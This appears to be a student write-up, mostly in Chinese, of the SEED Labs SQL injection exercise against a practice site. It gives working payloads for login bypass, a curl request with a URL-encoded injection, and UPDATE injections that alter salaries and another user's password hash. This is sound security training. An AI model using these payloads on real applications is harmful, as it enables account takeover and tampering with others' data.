1.Overview
2.Lab Environment
Virtual machine
虚拟机中访问:
Physical machine
物理机中访问方法:
添加DNS解析
Apache configuration
无需配置
3.Lab Tasks
3.1 Task 1: Get Familiar with SQL Statement
3.2 Task 2: SQL Injection Attack on SELECT Statement
Task 2.1: SQL Injection Attack from webpage.
构造注入语句: Admin’; #
Task 2.2: SQL Injection from command line.
获取url编码后的注入代码
获取目标url:http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin&Password=
根据URL编码构造注入核心代码:admin%27%3B%23
构造语句: http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin%27%3B%23&Password=
或 http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin%27%3B%23
终端中发送http请求:curl ‘http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin%27%3B%23&Password=’
创建一个txt文档
修改为html文件
用浏览器打开
Task 2.3: Append a new SQL statement.
构造注入语句: Alice';update credential set name=Alic where ID=1;#
Alice' and update credential set name=Alic where ID=1;#
3.3 Task 3: SQL Injection Attack on UPDATE Statement.
Task 3.1: Modify your own salary.
打开alice的修改界面
根据数据库中她的ID=1
构造注入语句: ',salary='1' where ID=1;#
修改成功
Task 3.2: Modify other people’s salary
先查看Boby的薪水
构造注入语句',salary='2’ where ID=2;#
在alice的编辑页面进行注入
注入后使用
boby';#
登陆并查看boby的薪水
Task 3.3: Modify other people’s password
SEEDlabs SQLInjection采用的是sha1hash加密用户密码
',Password='40bd001563085fc35165329ea1ff5c5ecbdbbeef’ where ID=1;#
3.4 Task 4: Countermeasure-Prepared Statement
4. Guidelines
5. Submission